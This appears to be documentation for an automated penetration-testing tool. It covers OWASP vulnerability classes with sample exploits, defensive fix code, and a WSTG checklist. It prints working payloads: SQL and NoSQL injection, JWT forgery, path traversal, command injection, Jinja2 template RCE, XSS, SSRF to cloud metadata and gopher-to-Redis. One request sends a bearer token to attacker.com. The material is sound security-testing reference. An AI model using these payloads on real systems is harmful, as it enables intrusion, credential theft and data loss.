Shannon targets five major vulnerability classes based on the OWASP Top 10 and OWASP API Security Top 10. Every vulnerability must be successfully exploited with a working proof-of-concept to be included in reports.

Covered vulnerability classes

Broken authentication

Authentication vulnerabilities allow attackers to bypass or compromise user authentication mechanisms.
Description: Direct SQL injection in login forms enabling authentication without valid credentials
Detection: Shannon analyzes login endpoints for string interpolation in SQL queries
Exploitation:
curl -X POST /api/login \
  -d '{"email":"admin'\''--","password":"irrelevant"}'
Impact: Complete authentication bypass, admin access
Example: Juice Shop INJ-VULN-01

Description: JWT libraries accepting symmetric algorithm (HS256) when configured for asymmetric (RS256)
Detection: Shannon tests JWT validation by signing tokens with the public key using HMAC
Exploitation:
import jwt
forged = jwt.encode({'user': 'admin'}, public_key, algorithm='HS256')
Impact: Authentication bypass, privilege escalation
Example: crAPI AUTH-VULN-01

Description: JWT validation accepting unsigned tokens with algorithm set to "none"
Detection: Shannon submits tokens with alg:none header and no signature
Exploitation:
TOKEN=$(echo '{"alg":"none"}' | base64).\
$(echo '{"user":"admin"}' | base64).
Impact: Universal authentication bypass
Example: crAPI AUTH-VULN-02

Description: No password complexity requirements or account lockout
Detection: Shannon attempts registration with weak passwords and brute force attacks
Impact: Account compromise via brute force

Description: Systems with unchanged default usernames and passwords
Detection: Shannon tests common default credentials (admin/admin, root/root, etc.)
Impact: Immediate administrative access
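A server-side verifier that pins the accepted algorithm, added here as an example (not Shannon's code and not from any of the target applications): the allowlist check rejects both the alg:none token and an HS256 token HMAC-signed with the public key before any signature work happens. Keys and claims are constructed, and only HS256 signature verification is implemented.

```python
import base64
import hashlib
import hmac
import json

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))  # restore padding

def make_hs256_token(claims: dict, secret: bytes) -> str:
    """Builds HS256 tokens; used here only to construct inputs for the verifier."""
    head = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"

def verify_jwt(token: str, key: bytes, allowed_algs=("HS256",)) -> dict:
    """Returns the claims only if the header's alg is in the server-side allowlist
    AND the signature verifies with the server's key. Pinning the algorithm on
    the server is the fix for both "alg: none" and HS256/RS256 confusion: the
    token never gets to choose how it is verified. Only HS256 signature
    checking is implemented in this example."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    head_b64, body_b64, sig_b64 = parts
    alg = json.loads(b64url_decode(head_b64)).get("alg")
    if alg not in allowed_algs:
        # Rejects "none", and rejects an HS256 token HMAC-signed with the
        # public key when the service is configured for RS256, before any
        # signature work is done.
        raise ValueError(f"algorithm {alg!r} not permitted")
    if alg != "HS256":
        raise ValueError(f"no verifier for {alg} in this example")
    expected = hmac.new(key, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(body_b64))

def is_accepted(token: str, key: bytes, allowed_algs=("HS256",)) -> bool:
    """True if verify_jwt accepts the token; handy for tests and logging."""
    try:
        verify_jwt(token, key, allowed_algs)
        return True
    except ValueError:
        return False
```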

Broken authorization

Authorization vulnerabilities allow attackers to access resources or perform actions beyond their privileges.
Description: Predictable object identifiers without ownership validation
Detection: Shannon enumerates IDs and tests access across user contexts
Exploitation:
# Regular user accessing user ID 1 (admin)
curl -H "Authorization: Bearer $USER_TOKEN" \
  http://app.com/api/users/1
Impact: Horizontal privilege escalation, data disclosure
Example: Juice Shop AUTHZ-VULN-03, crAPI AUTHZ-VULN-01

Description: Unfiltered input allowing modification of privileged object fields
Detection: Shannon includes privileged fields (role, admin, permissions) in update requests
Exploitation:
curl -X PUT /api/profile \
  -d '{"email":"[email protected]","role":"admin"}'
Impact: Privilege escalation from regular user to admin
Example: ctal AUTHZ-VULN-01, Juice Shop AUTHZ-VULN-01

Description: Admin endpoints accessible to regular users due to missing role checks
Detection: Shannon tests admin endpoints with regular user tokens
Impact: Administrative functionality abuse
Example: crAPI AUTHZ-VULN-04

Description: Path manipulation enabling access to files outside intended directory
Detection: Shannon tests file parameters with ../ sequences
Exploitation:
curl http://app.com/download?file=../../../../etc/passwd
Impact: Arbitrary file read, configuration disclosure
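Handler logic for the first two items (object-level authorization and mass assignment), added as an example and not taken from Shannon or the target applications: the user ID in the path is checked against the requester, and an update body may only touch an allowlist of fields, so {"role":"admin"} is refused. The in-memory user table and HTTP-style status codes are constructed.

```python
# Constructed in-memory user table standing in for the application's database.
USERS = {
    1: {"email": "admin@example.com", "role": "admin"},
    2: {"email": "bob@example.com", "role": "user"},
}
# Only these fields may be set by a client; role/admin/permissions are assigned
# server-side and are never copied from a request body.
CLIENT_WRITABLE = {"email", "display_name"}

def get_user(requester_id: int, target_id: int) -> tuple[int, dict]:
    """GET /api/users/{target_id}. The ID in the path is untrusted input: the
    record is returned only if the requester owns it or holds the admin role."""
    requester = USERS.get(requester_id)
    if requester is None:
        return 401, {"error": "unauthenticated"}
    if requester_id != target_id and requester["role"] != "admin":
        return 403, {"error": "forbidden"}
    target = USERS.get(target_id)
    return (200, target) if target is not None else (404, {"error": "not found"})

def update_profile(requester_id: int, target_id: int, body: dict) -> tuple[int, dict]:
    """PUT /api/profile for target_id. Reuses the ownership check, then copies only
    allowlisted fields. Unknown fields are rejected rather than silently dropped,
    so a request carrying "role" surfaces in access logs as a 400."""
    status, record = get_user(requester_id, target_id)
    if status != 200:
        return status, record
    extra = set(body) - CLIENT_WRITABLE
    if extra:
        return 400, {"error": "fields not writable", "fields": sorted(extra)}
    record.update(body)
    return 200, record
```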

Injection attacks

Injection vulnerabilities occur when untrusted data is sent to an interpreter as part of a command or query.
Description: SQL injection enabling data extraction via UNION SELECT
Detection: Shannon tests for SQL errors, then extracts data using UNION queries
Exploitation:
curl "http://app.com/search?q=x'%20UNION%20SELECT%20username,password%20FROM%20users--"
Impact: Complete database compromise, credential theft
Example: Juice Shop INJ-VULN-02, crAPI INJ-VULN-01

Description: Blind SQL injection using time delays to infer data
Detection: Shannon injects sleep() commands and measures response times
Exploitation:
# PostgreSQL
curl "http://app.com/api/product/123'%20AND%20pg_sleep(5)--"

# MySQL
curl "http://app.com/api/product/123'%20AND%20sleep(5)--"
Impact: Data exfiltration via boolean queries
Example: crAPI INJ-VULN-02

Description: NoSQL operator injection in MongoDB queries
Detection: Shannon injects MongoDB operators ($ne, $gt, $regex)
Exploitation:
{"username": {"$ne": null}, "password": {"$ne": null}}
Impact: Authentication bypass, data extraction
Example: Juice Shop INJ-VULN-04

Description: OS command execution via unsanitized user input
Detection: Shannon injects shell metacharacters and tests for command execution
Exploitation:
curl -X POST /api/debug/exec \
  -d '{"command":"ls;cat /etc/passwd"}'
Impact: Complete server compromise, RCE
Example: ctal INJ-VULN-01 (root-level execution)

Description: Template engine code execution via user-controlled templates
Detection: Shannon tests template expressions ({{7*7}}, ${7*7}) and checks for evaluation
Exploitation:
# Jinja2
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

# Handlebars
{{#with "s" as |string|}}
  {{#with "e"}}
    {{lookup string.sub "constructor"}}
  {{/with}}
{{/with}}
Impact: Remote code execution
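The string-interpolation pattern Shannon's detection step looks for, beside its parameterised fix, added as an example (not Shannon's code): the login payload from the broken authentication section returns the admin row from the interpolated query and nothing from the bound one. The SQLite table, users and passwords are constructed; passwords are stored in clear only to keep the example short, real code compares a password hash.

```python
import sqlite3

def setup_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "constructed-admin-pw", "admin"),
        (2, "bob", "constructed-bob-pw", "user"),
    ])
    return conn

def login_vulnerable(conn: sqlite3.Connection, email: str, password: str):
    """Request values spliced into the query text: a quote in the email ends the
    string literal and '--' comments out the password comparison, so the
    statement that actually runs is  WHERE email = 'admin'."""
    sql = (f"SELECT email, role FROM users "
           f"WHERE email = '{email}' AND password = '{password}'")
    return conn.execute(sql).fetchone()

def login_fixed(conn: sqlite3.Connection, email: str, password: str):
    """Parameterised query: the statement is parsed first and the values are bound
    afterwards, so quotes, '--' and UNION keywords are only ever compared as data.
    The same change fixes the UNION and time-based variants above."""
    sql = "SELECT email, role FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchone()
```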

Cross-site scripting (XSS)

XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users.
Description: User input immediately reflected in HTTP response without sanitization
Detection: Shannon injects XSS payloads into parameters and checks for execution
Exploitation:
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<iframe src="javascript:alert('XSS')">
Impact: Session hijacking, credential theft, defacement
Example: Juice Shop XSS-VULN-01

Description: Malicious script stored in database and executed when viewed by users
Detection: Shannon submits XSS payloads via forms and checks rendering contexts
Impact: Persistent XSS affecting all users, worm potential

Description: Client-side script execution via unsafe JavaScript sinks
Detection: Shannon analyzes JavaScript code for unsafe sinks (innerHTML, eval, document.write)
Exploitation:
// Payload in URL fragment
http://app.com/#<img src=x onerror=alert(1)>
Impact: Client-side code execution

Description: Bypassing framework sanitization via encoding or polyglot payloads
Detection: Shannon tests framework-specific bypass techniques
Exploitation:
<!-- Angular -->
<iframe src="javascript:alert(1)">

<!-- React -->
<a href="javascript:alert(1)">Click</a>
Impact: XSS in supposedly safe frameworks
Example: Juice Shop XSS-VULN-01 (Angular bypass)
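Context-aware output encoding on the server side, added as an example (not Shannon's code): entity-escaping neutralises the reflected and stored payloads above, while the href/src case needs a scheme allowlist, because escaping cannot stop a javascript: URL, which is the Angular iframe and React anchor bypass. The comment template and inputs are constructed.

```python
import html
from urllib.parse import urlsplit

# URL schemes permitted in href/src; "" covers relative links such as /user/2.
SAFE_URL_SCHEMES = {"http", "https", "mailto", ""}

def safe_text(value: str) -> str:
    """HTML text and quoted-attribute context: <, >, &, " and ' become entities,
    so "<img src=x onerror=alert(1)>" is rendered as literal text, not a tag."""
    return html.escape(value, quote=True)

def safe_url(value: str) -> str:
    """href/src context. Entity-escaping leaves "javascript:alert(1)" fully
    functional here, so the scheme is allowlisted instead. Tabs and newlines are
    stripped first because browsers ignore them inside the scheme ("java\\tscript:")."""
    cleaned = "".join(ch for ch in value if ch not in "\t\r\n").strip()
    if urlsplit(cleaned).scheme.lower() not in SAFE_URL_SCHEMES:
        return "#"  # neutralise rather than render
    return html.escape(cleaned, quote=True)

def render_comment(author: str, body: str, profile_url: str) -> str:
    """Stored-XSS sink: each value is encoded for the context it lands in."""
    return (f'<div class="comment"><b>{safe_text(author)}</b>: {safe_text(body)} '
            f'<a href="{safe_url(profile_url)}">profile</a></div>')
```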

Server-side request forgery (SSRF)

SSRF vulnerabilities allow attackers to make requests from the server to internal or external systems.
Description: SSRF enabling access to internal services not exposed to the internet
Detection: Shannon tests URL parameters with internal IPs and localhost
Exploitation:
# Access Redis
curl -X POST /api/fetch \
  -d '{"url":"http://localhost:6379"}'

# Access internal admin panel
curl -X POST /api/fetch \
  -d '{"url":"http://internal-admin:8080/admin"}'
Impact: Internal network access, service enumeration
Example: Juice Shop SSRF-VULN-01

Description: SSRF accessing cloud provider instance metadata
Detection: Shannon tests metadata endpoints for AWS, GCP, Azure
Exploitation:
# AWS
curl -X POST /api/share/report \
  -d '{"url":"http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'

# GCP
curl -X POST /api/share/report \
  -d '{"url":"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"}'
Impact: IAM credential theft, cloud account compromise
Example: crAPI SSRF-VULN-01

Description: SSRF automatically forwarding the user's authentication headers
Detection: Shannon tests whether Authorization headers are forwarded to attacker-controlled servers
Exploitation:
# Exfiltrate JWT to attacker server
curl -X POST /api/share/report \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"url":"http://attacker.com/collect"}'
Impact: Credential exfiltration, token theft
Example: crAPI SSRF-VULN-01 (critical)

Description: SSRF using non-HTTP protocols for file read or protocol smuggling
Detection: Shannon tests file:// for local file access and gopher:// for protocol smuggling
Exploitation:
# File protocol
curl -X POST /api/fetch \
  -d '{"url":"file:///etc/passwd"}'

# Gopher protocol (Redis exploitation)
curl -X POST /api/fetch \
  -d '{"url":"gopher://localhost:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a"}'
Impact: File read, service exploitation
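A destination check for a server-side fetch endpoint, added as an example (not Shannon's code): it refuses non-HTTP schemes (the file:// and gopher:// cases), the loopback, link-local and private ranges tested above, and known metadata hostnames, and it flags plain hostnames for resolution so the caller can re-check every address it will actually connect to. The blocked-hostname list and the sample URLs are constructed.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # file://, gopher://, dict:// and friends are refused
# Names that point at the host itself or at cloud metadata services (no DNS needed).
BLOCKED_HOSTNAMES = {"localhost", "metadata.google.internal", "metadata", "instance-data"}

def address_is_internal(ip) -> bool:
    """True for anything not globally routable: 127/8, 10/8, 172.16/12, 192.168/16,
    169.254/16 (AWS and Azure metadata at 169.254.169.254), 100.64/10, 0.0.0.0,
    ::1, fc00::/7, fe80::/10, plus IPv4-mapped IPv6 forms of the same ranges."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not ip.is_global

def check_outbound_url(url: str) -> tuple[str, str]:
    """Decide whether the server may fetch url on a user's behalf.
    Returns ("deny" | "allow" | "resolve", reason). "resolve" means the host is a
    name: the caller must resolve it, run address_is_internal() on every returned
    address, connect only to those addresses, and repeat the check on every
    redirect (otherwise DNS rebinding and redirect chains bypass a one-time
    check). Numeric host forms that ip_address() does not parse (decimal or
    octal IPv4) also end up on the resolver path and are caught there."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "deny", f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # already lowercased, brackets stripped
    if not host:
        return "deny", "missing host"
    if host.rstrip(".") in BLOCKED_HOSTNAMES:
        return "deny", f"host {host!r} is blocked"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "resolve", f"hostname {host!r}: resolve and re-check every address"
    if address_is_internal(ip):
        return "deny", f"address {ip} is not globally routable"
    return "allow", "ok"
```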

WSTG checklist

Shannon’s coverage mapped to the OWASP Web Security Testing Guide (WSTG) v4.2:
Test ID        Test Name                                               Status
WSTG-INFO-02   Fingerprint web server
WSTG-INFO-06   Identify application entry points
WSTG-INFO-07   Map execution paths through application
WSTG-INFO-08   Fingerprint web application framework
WSTG-INFO-09   Fingerprint web application
WSTG-INFO-10   Map application architecture
WSTG-CONF-01   Test network infrastructure configuration
WSTG-CONF-10   Test for subdomain takeover

Test ID        Test Name                                               Status
WSTG-ATHN-01   Credentials transported over encrypted channel
WSTG-ATHN-02   Testing for default credentials
WSTG-ATHN-03   Testing for weak lock out mechanism
WSTG-ATHN-04   Testing for bypassing authentication schema
WSTG-ATHN-07   Testing for weak password policy
WSTG-ATHN-08   Testing for weak security question/answer
WSTG-ATHN-09   Testing for weak password change/reset
WSTG-ATHN-10   Testing for weaker authentication in alternative channel
WSTG-ATHN-11   Testing multi-factor authentication (MFA)

Test ID        Test Name                                               Status
WSTG-ATHZ-01   Testing directory traversal/file include
WSTG-ATHZ-02   Testing for bypassing authorization schema
WSTG-ATHZ-03   Testing for privilege escalation
WSTG-ATHZ-04   Testing for insecure direct object references
WSTG-ATHZ-05   Testing for OAuth weaknesses

Test ID        Test Name                                               Status
WSTG-SESS-01   Testing for session management schema
WSTG-SESS-02   Testing for cookies attributes
WSTG-SESS-03   Testing for session fixation
WSTG-SESS-05   Testing for Cross Site Request Forgery
WSTG-SESS-06   Testing for logout functionality
WSTG-SESS-07   Testing session timeout
WSTG-SESS-10   Testing JSON Web Tokens
WSTG-SESS-11   Testing for concurrent sessions

Test ID        Test Name                                               Status
WSTG-INPV-01   Testing for reflected cross site scripting
WSTG-INPV-02   Testing for stored cross site scripting
WSTG-INPV-05   Testing for SQL injection
WSTG-INPV-11   Testing for code injection
WSTG-INPV-12   Testing for command injection
WSTG-INPV-18   Testing for server-side template injection
WSTG-INPV-19   Testing for server-side request forgery
WSTG-CLNT-01   Testing for DOM based cross site scripting
WSTG-CLNT-02   Testing for JavaScript execution
WSTG-CLNT-03   Testing for HTML injection

Test ID        Test Name                                               Status
WSTG-APIT-01   API reconnaissance
WSTG-APIT-02   API broken object level authorization
WSTG-APIT-99   Testing GraphQL
For the complete WSTG checklist with all 159 controls, see the COVERAGE.md file in the Shannon repository.
